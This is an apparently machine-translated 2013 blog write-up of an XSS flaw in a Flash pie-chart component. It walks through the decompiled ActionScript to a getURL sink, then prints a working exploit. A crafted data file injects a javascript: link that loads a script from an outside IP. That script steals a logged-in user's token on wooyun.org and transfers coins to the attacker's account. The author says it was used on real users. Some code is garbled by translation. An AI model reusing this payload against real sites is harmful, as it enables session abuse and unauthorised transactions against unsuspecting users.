2013/07/30 21:56

The cause of

Please the reader look here: zone.wooyun.org/content/499…

Take the risk of dissecting the bug details and decompile the Flash code at www.showmycode.com/.

The configuration file is passed in with the data argument. Search for _root.data and find the following code:

#! as3 var lv = new LoadVars(); lv.onLoad = LoadVarsOnLoad; lv.make_chart = make_chart; lv.make_pie = make_pie; if (_root.data == undefined) { if (_root.variables == undefined) { _root.data = "C:\\Users\\John\\Documents\\flash\\svn\\data-files\\data-47.txt"; lv.load(_root.data); } else { _root.LoadVarsOnLoad = LoadVarsOnLoad; _root.LoadVarsOnLoad(true); } } else { lv.load(_root.data); }Copy the code

By LoadVars, the data loaded by LoadVars is separated by ampersands, and the LoadVarsOnLoad function is called. Follow in and look at the code

#! as3 function LoadVarsOnLoad(success) { if (! success) { _root.loading.done(); _root.oops(_root.data); return(undefined); } if (_root.oops ! = undefined) { removeMovieClip("oops"); } for (i in _root) { if (typeof(_root[i]) == "movieclip") { removeMovieClip(_root[i]); } delete i; } _root.css = new Css("margin-top: 30; margin-right: 40;" ); NumberFormat.getInstance(this); NumberFormat.getInstanceY2(this); _root._background = new Background(this); if (this.pie ! = undefined) { this.make_pie(); } else { this.make_chart(); } if (this.tool_tip ! = undefined) { _root.tool_tip_wrapper = this.tool_tip.replace("#comma#", ","); } _root.loading.done(); _root.move(); }Copy the code

Look below, call this.make_pie() if there is pie in the external data.

#! as3 if (this.pie ! = undefined) { this.make_pie(); }Copy the code

Search the make_pie function to see the code, which looks like this, calling new PieStyle(this, “pie”);

#! as3 function make_pie() { _root._pie = new PieStyle(this, "pie"); _root._title = new Title(this); }Copy the code

Moving on, the initializer in this class starts with links = lv.links.split(“,”); Lv. links is passed in from the outside, and then put in links after split, and finally call set_values(_local6), continue to look at set_values function, with the following code:

#! as3 function set_values(v) { super.set_values(v); pie_mcs = new Array(values.length); var _local4 = 0; while (_local4 < values.length) { var _local5 = _root.createEmptyMovieClip((name + "_") + _local4, _root.getNextHighestDepth()); _local5.onRollOver = function () { ChartUtil.FadeIn(this, true); }; _local5.onRollOut = function () { ChartUtil.FadeOut(this); }; if (links.length > _local4) { _local5._ofc_link = links[_local4]; _local5.onRelease = function () { trace(this._ofc_link); getURL (this._ofc_link); }; } var _local6 = {x_label:labels[_local4], value:values[_local4], key:"??" }; _local5.tooltip = _local6; pie_mcs[_local4] = _local5; _local4++; } valPos(); }Copy the code

This function is the key, traversing links and putting it in getURL, because getURL is where you can execute your JS code.

using

Now that you can XSS, you can bypass the token mechanism and operate on Wooyun’s business. Let’s take a look at how to construct remote data. Look at the following code:

< font style = "font-size:18px; Color: #d01f3c} &x_axis_steps=1 &&y_ticks =2,# E4F0DB =0 &&y_min =0 &&y_max =20 &&y_pie =60,#E4F0DB,{display:none; },1,,1& &values=50,50& &pie_labels= remote command execution, Tencent client overflow & &colours=#d01f3c,#356aa0& &links=javascript:window.s=document.createElement('script'); Window. The s.s rc = 'http://42.96.150.181/data.js'; document.body.appendChild(window.s); ,javascript:window.s=document.createElement('script'); Window. The s.s rc = 'http://42.96.150.181/data.js'; document.body.appendChild(window.s); Tool_tip = Category %3A+% 23X_label %23%3Cbr%3E Proportion %3A+% 23VAL %23%25&Copy the code

From a very loud title Ming “Tencent high-risk vulnerability list (click categories can view details)”, let see very desire to click on the middle of the circle there is no link written

javascript:window.s=document.createElement('script'); Window. The s.s rc = 'http://42.96.150.181/data.js'; document.body.appendChild(window.s);Copy the code

Load our js file.

The code for the js file is as follows:

#! javascript /* * ajax */ ajax = function(url, params, callback) { (params instanceof Function) && (callback = params, params = void(0)); var XHR = (window.XDomainRequest) || window.XMLHttpRequest || (function() { return new ActiveXObject('MSXML2.XMLHTTP') }); var xhr = new XHR(); xhr.open(params ? 'post' : 'get', url); xhr.withCredentials = true; try { params && xhr.setRequestHeader('content-type', 'application/x-www-form-urlencoded'); } catch (e) {} callback && (xhr.onreadystatechange = function() { (this.readyState == 4 && ((this.status >= 200 && this.status <= 300) || this.status == 304)) && callback.apply( this, arguments); }); xhr.send(params); }; ajax("http://www.wooyun.org/user.php?action=update", function(){ var token = this.responseText.match(/token" value=\"(.+?)\"/)[1] ajax("http://www.wooyun.org/user.php?action=coin&do=action_submit", "token=" + token + "&to_whitehat=xsser&to_coin= 1");  })Copy the code

Using the Ajax code in Sogili xss.js, get the token of the current user first and then perform the transfer operation.

The effect

To find a practical place to wooyun, see here: zone.wooyun.org/content/554…

subsequent

In fact, I did not think so many people in the move, originally holding the purpose of entertainment to play, it seems that a lot of people are in high mood, here first to you embrace an apology.